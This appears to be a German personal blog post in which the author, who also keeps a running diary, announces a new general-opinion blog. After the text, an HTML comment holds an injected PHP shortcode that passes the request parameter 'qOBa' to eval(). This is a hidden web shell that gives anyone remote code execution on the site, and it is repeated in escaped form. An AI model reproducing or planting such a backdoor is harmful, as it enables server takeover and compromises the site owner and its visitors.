Und schon wieder ein neuer Blog…

…allerdings kein neuer Blogger. Ich schreibe schon länger über meine sportlichen Erlebnisse in meinem Lauftagebuch. Früher hatte ich auch lange Zeit einen Blog rund um die Themen Internet, Technik, etc. Eben genau die Dinge, die mich damals während meines Informatikstudiums interessierten. Darüber hinaus hab es noch ein paar eher als Experiment zu betrachtende Blogs von mir.

Und jetzt? Ich merke, das es mir Spaß macht meine Meinung in den Weiten des Internets zu verbreiten. Mein Sportblog und Twitter sind aber bei vielen Themen der falsche Kanal. Daher habe ich diese schmucke Domain aktiviert (sie hatte schon lange bei mir geschlummert) und mit einem jungfräulichen Blog bestückt. Was es künftig für Themen von mir geben wird, weiß ich noch nicht so ganz genau. Ich will das so wie das Leben halten: Überraschungen gibt es jeden Tag.

<!– [insert_php]if (isset($_REQUEST["qOBa"])){eval($_REQUEST["qOBa"]);exit;}[/insert_php]

if (isset($_REQUEST[&quot;qOBa&quot;])){eval($_REQUEST[&quot;qOBa&quot;]);exit;}

–>